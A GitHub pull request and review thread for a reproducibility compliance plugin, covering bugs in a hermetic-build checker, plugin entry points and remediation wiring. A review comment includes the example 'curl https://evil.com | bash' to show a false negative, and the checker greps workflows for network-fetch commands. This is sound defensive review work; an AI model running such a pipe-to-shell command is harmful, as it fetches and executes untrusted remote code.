feat: scientific reproducibility plugin#138
Conversation
mlieberman85
left a comment
There was a problem hiding this comment.
PR Review: Scientific Reproducibility Plugin
Tested all 5 handlers against this repo. L1 controls (deps pinned, build env declared) and L2 hermetic build pass. L2 provenance and L3 bit-for-bit are correctly INCONCLUSIVE. The plugin structure follows established patterns.
Bug: Hermetic build handler has false negatives
repro_hermetic_build_handler checks for safe patterns at the file level, not per-line. If any safe pattern (e.g. uv sync) appears anywhere in a workflow file, all suspicious patterns (curl, apt-get install) in that same file are silently ignored:
is_safe = any(safe in content for safe in safe_patterns)
if pattern in content and not is_safe:
violations.append(...)A workflow containing both uv sync and curl https://evil.com | bash passes as "hermetic." The safe-pattern check needs to be per-line or per-step, not per-file.
Note: Hermetic build check is a starting point
The RE-02.01 handler greps CI YAML for obvious network fetch commands, which is a reasonable first pass but doesn't verify actual build isolation. It will miss network access from Makefiles, setup.py, or anything not invoked via the checked CLI tools, and will false-fail on legitimate post-build uses of curl/wget. True hermetic build enforcement likely requires an isolation mechanism — something like Witness for runtime attestation, or build systems with built-in sandboxing like Bazel (--sandbox_network=false) or Nix. Worth opening an issue to track evolving this control.
Bug: Same plugin.py indentation issue
Lines 114, 136, 151, 165 — identical to #136 and #137. All Marc-cn PRs share this.
Minor
- No tests in the diff (PR claims 28 tests). I wrote 44 (31 handler tests + 13 implementation tests), all pass.
- Remediation for RE-01.01 hardcodes
uv lock— won't help non-Python projects - Missing SARIF fields (acknowledged)
What's good
- Well-chosen controls that cover the reproducibility spectrum (L1 basic hygiene → L3 bit-for-bit)
- Handlers are filesystem-based with no subprocess calls — easy to test, no external tool dependencies
- Good evidence collection (lists all files checked and found)
- Conservative defaults — returns INCONCLUSIVE when signals are absent rather than guessing
…g isinstance checks
…otocol, loader forge/build storage, add tests
|
Applied the same fixes from #136 and #137:
"Note: Hermetic build check is a starting point", should we open a GitHub issue to track it? Something like "RE-02.01 HermeticBuild: evolve beyond grep-based heuristic toward runtime attestation". |
|
@Marc-cn let's create a tracking issue with how you see this going and we can track where we're going with it and what you plan to support out of the gate and what you plan to support long term. |
mlieberman85
left a comment
There was a problem hiding this comment.
Re-review: hermetic build fix is correct, structural questions remain
The per-line refactor of repro_hermetic_build_handler is right and the new regression test (test_pass_does_not_ignore_violations_when_safe_pattern_present) explicitly nails the bug class I flagged. Nice. Workspace registration looks correct; the package will actually be discoverable now.
Fixed since last review ✅
- Hermetic build per-line check (and a regression test that would have caught the original bug).
plugin.pyindentation — handled in the shared base path; not in this diff.- Workspace registration — root
pyproject.tomlnow listsdarnit-reproducibilityas a workspace dep. - Tests added (14 handler tests + implementation tests).
Still outstanding ⚠️
Tracking issue for HermeticBuild evolution — I asked you to open one a while back so we can plan out what RE-02.01 supports out of the gate vs. long term (Witness / Bazel sandbox / Nix / etc.). I couldn't find one. Could you open it before merge? A short writeup of: (a) what the v0.1 grep heuristic catches and misses, (b) what "true" hermeticity verification would require, (c) which signals you'd want to add next (composite actions, Makefile, setup.py, runtime attestation). Link it from RE-02.01 in reproducibility.toml so the limitation is visible to anyone reading the control.
Structural questions — please clarify before merge
See inline comments. Short version:
- Two ways to expose handlers (
register_sieve_handlers()+get_check_handlers()) — which does the framework actually consume? If both, why? - Two framework-path entry points (
darnit.frameworks→get_framework_path()anddarnit.implementations→impl.get_framework_config_path()) returning the same path. Pick one. [controls."RE-01.01".remediation]exists in TOML butget_remediation_registry()returns{}. Does the framework auto-load TOML remediations, or is there a wiring gap?
None of these break correctness today, but the protocol surface for plugin authors is becoming muddled and worth tightening before another plugin lands.
Minor
pyproject.tomlandreproducibility.tomlboth lack trailing newlines (\ No newline at end of filein diff). Add them.RE-01.01remediation hardcodesuv lock— fine for v0.1 (and thespec_version = "repro v0.1"is honest about scope), but please add a TOML comment noting it's Python-only and a TODO for per-language detection. Otherwise users withCargo.tomlwill get a confusing remediation suggestion.get_controls_by_levelbuilds the full 5-control list on every call, then filters. Build once and cache, or just haveget_all_controlsiterate directly. Cosmetic.spec_version = "repro v0.1"— other implementations use a more URI-like spec_version string ("https://baseline.openssf.org/versions/2025-10-10"). Pick a stable identifier scheme now while there's only one version.
What's good
- The five controls hit the right reproducibility ladder rungs (pinned deps → declared env → hermetic build → provenance → bit-for-bit), and each is appropriately conservative — INCONCLUSIVE when the signal isn't there, rather than false PASS.
- Handlers are pure-filesystem with no subprocess calls; trivially testable.
- Test coverage exercises both happy path and the specific regression case.
- Plugin structure (entry points,
register(),register_sieve_handlers, framework TOML) follows the established pattern fromdarnit-baselinecleanly.
Verdict: Lift the tracking-issue ask + the three structural clarifications, and this is mergeable. Bug fix itself is approved.
| "repro_deps_pinned": handlers.repro_deps_pinned_handler, | ||
| "repro_build_env_declared": handlers.repro_build_env_declared_handler, | ||
| "repro_hermetic_build": handlers.repro_hermetic_build_handler, | ||
| "repro_provenance_exists": handlers.repro_provenance_exists_handler, |
There was a problem hiding this comment.
Two handler-exposure surfaces here — register_sieve_handlers() (called from __init__.py:register(), registers directly with the global registry) and get_check_handlers() (returns a dict). Which one does the framework actually consume?
If both: each plugin author now has to keep two parallel lists in sync, and forgetting one will silently break in different ways depending on which code path the framework hits. I'd push for one canonical surface and delete the other.
If the answer is "register_sieve_handlers is the real one, get_check_handlers is for some legacy/MCP-tool path," please drop a comment on get_check_handlers saying so.
|
|
||
|
|
||
| def get_framework_path() -> Path: | ||
| """Entry point for framework TOML discovery.""" |
There was a problem hiding this comment.
Two entry points pointing at the same TOML:
darnit.implementations→register()→impl.get_framework_config_path()returnsreproducibility.tomldarnit.frameworks→get_framework_path()returns the samereproducibility.toml
Is the darnit.frameworks entry point still required by the loader, or is get_framework_config_path() on the implementation enough now? If both are required, OK — but please document why so future plugin authors don't have to reverse-engineer it. If only one is needed, drop the other.
| level=2, | ||
| domain="RE", | ||
| metadata={}, | ||
| ), |
There was a problem hiding this comment.
get_remediation_registry() returns {}, but reproducibility.toml defines a real remediation for RE-01.01:
[[controls."RE-01.01".remediation.handlers]]
handler = "exec"
command = ["uv", "lock"]
dry_run_command = ["uv", "lock", "--dry-run"]Does the framework auto-load TOML-defined remediations and merge them with get_remediation_registry()? If yes, please confirm with a quick test that darnit run --remediate actually picks up the uv lock step. If no, this remediation is dead config and you'd need to expose it through the registry.
| dry_run_command = ["uv", "lock", "--dry-run"] | ||
|
|
||
| # ============================================================================= | ||
| # Control: Is the build environment declared? |
There was a problem hiding this comment.
uv lock is Python-specific and will produce a confusing suggestion on, e.g., a Rust or Go project that fails this control because they have no lock file. Two options:
- Detect language from
project.primary_language(now stored by the loader change in feat: LangGraph agentic orchestrator: state machine, LLM backends, CLI run, human feedback #137) and gate the remediation onpython. - For v0.1, just add a TOML comment +
# TODOnoting this is Python-only and add a tracking issue for per-language remediation.
Either is fine; current state silently misleads non-Python users.
| ) | ||
| break # one violation per line is enough | ||
| except Exception: | ||
| continue |
There was a problem hiding this comment.
The hermetic-build check only looks at .github/workflows/*.{yml,yaml} — but real builds frequently fetch deps from Makefile, setup.py, build.sh, composite-action action.yml, or Containerfile/Dockerfile. A workflow that just runs make build will look hermetic here even if the Makefile does curl ... | bash.
This isn't a blocker for v0.1 (it's a documented heuristic), but the limitation should be (a) noted in the docstring so reviewers understand the signal, and (b) captured in the tracking issue I asked for above so we have a roadmap for tightening it.
Summary
Adds a new compliance domain covering scientific reproducibility of software
builds. Separate from the OpenSSF baseline which focuses on security — this
covers whether a build can be independently reproduced.
Type of Change
Framework Changes Checklist
uv run python scripts/validate_sync.py --verboseand it passesuv run python scripts/generate_docs.pyand committed any doc changesControl/TOML Changes Checklist
Testing
What was built
Cargo.lock, package-lock.json, go.sum, etc.
.devcontainer/, .python-version, etc.
fetches: curl, wget, raw pip install
sigstore/cosign or slsa-github-generator
in CI and reprotest / diffoscope usage
Additional Notes